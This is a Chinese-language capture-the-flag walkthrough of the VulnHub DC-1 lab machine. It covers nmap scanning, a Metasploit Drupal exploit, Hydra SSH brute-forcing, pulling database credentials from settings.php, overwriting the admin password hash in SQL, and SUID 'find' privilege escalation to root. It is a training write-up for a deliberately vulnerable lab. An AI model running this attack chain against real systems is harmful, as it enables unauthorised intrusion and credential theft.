DC-1
DC-1下载:https://download.vulnhub.com/dc/DC-1.zip
攻击者kali IP:192.168.1.9
受害者DC-1 IP:192.168.1.8
将DC-1靶机调成和kali同为桥接模式,因为DC-1的账号和密码还不知道,所以不能查看DC-1的IP地址,那么我们将通过kali来扫描到DC-1的IP地址。
1 使用命令 arp-scan -l 列出当前局域网的所有设备,在DC-1的网络适配器查看到的mac地址和扫描出来的192.168.1.8一致。
2 使用nmap来扫描DC-1
nmap -A 192.168.1.8
从扫描结果可以看到有22和80端口,因为还不知道DC-1所使用的用户,所有还不能爆破ssh,先访问一下80端口网页。
3 访问到的web界面,发现需要账号密码登录,使用burp爆破没有结果。但是发现了CMS,尝试去msf的漏洞库搜索一下。
4 在msf漏洞库搜索 Drupal,并攻击
启动msf的数据库
msfdb start
启动msfconsole
搜索 search Drupal
使用第二个漏洞
use 2
使用shuow missing查看一下必须要设置的选项
需要设置rhosts,rhosts就是设置靶机的IP地址
使用set设置
set rhosts 192.168.1.8
使用show options 可以查看设置好的信息
确定设置的信息没问题
输入run开始执行攻击,成功
flag1
ls可以看到第一个flag1.txt
第一个falg找到
5查看一下靶机的用户,发现有个flag4的用户
cat /etc/passwd
6 使用hydra来爆破一波看看是否能拿到密码
hydra -l flag4 -P /usr/share/john/password.lst 192.168.1.8 ssh
得到falg4账号的密码为 orange
7 使用ssh连接靶机
flag4
ls在flag4账户的目录下找到了falg4,可想而知还有在前面还有两个flag,可能在web上,因为web有账号
8 既然已经登录进靶机了,那么我们就去查看一下web的配置文件
进度入到var/www的目录下
在百度上可以找到drupal的配置文件是/var/www/sites/default/settings.php
使用命令查看一下
cat sites/default/settings.php
在配置文件中看到了flag2还有数据库的信息
flag2
数据库的账号:dbuser 密码: R0ck3t
9 使用命令连接数据库
mysql -u dbuser -p
连接成功
查看一下数据表
show databses;
使用数据表use drupaldb
查看表的数据show tables;
注意到表里的users
使用命令查看一下
select * from users;
可以看到管理员的账户,但是先要搞hash值,有点难
quit退出数据库连接
10 搜索一下passwd
find / -name password*
可以看到var/www/scripts下有个sh的脚本
直接执行试试
可以设置密码,尝试一下后面加上密码
scripts/password-hash.sh 123456
得到一个哈希值,那么我们可以将这个哈希值替换到数据库admin得账号下
11 修改数据库中admin的哈希值
update users set pass='$S$DvaDIRP8Hxz93/2ZLLeQrczm5gK1BR6KrJX2JmOGPB7boVeFE3wa' where name='admin';
修改成功尝试去web界面登录试试
flag3
找到flag3
12 falg4提示我们提权
find -name flag4.txt -exec /bin/bash -p \;
flag5
find -name flag4.txt -exec cat /root/thefinalflag.txt \;
CD-1靶机一共有5个flag
DC-1总结
nmap的基础使用,信息收集
msf漏洞库搜索漏洞
使用漏洞攻击靶机拿到shell,找到第一个flag,查看/etc/passwd
使用hydra爆破ssh登录的账号密码
登陆账号拿到第二个flag
查看到durpal的配置文件,获取到数据库信息,拿到第三个flag
尝试连接数据库,在数据库里发现admin账号,修改管理员的hash值
登录到web界面,拿到第四个flag文章来源:https://www.toymoban.com/news/detail-482703.html
提权root拿到第五个flag文章来源地址https://www.toymoban.com/news/detail-482703.html
到了这里,关于DC-1靶机渗透测试详细教程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!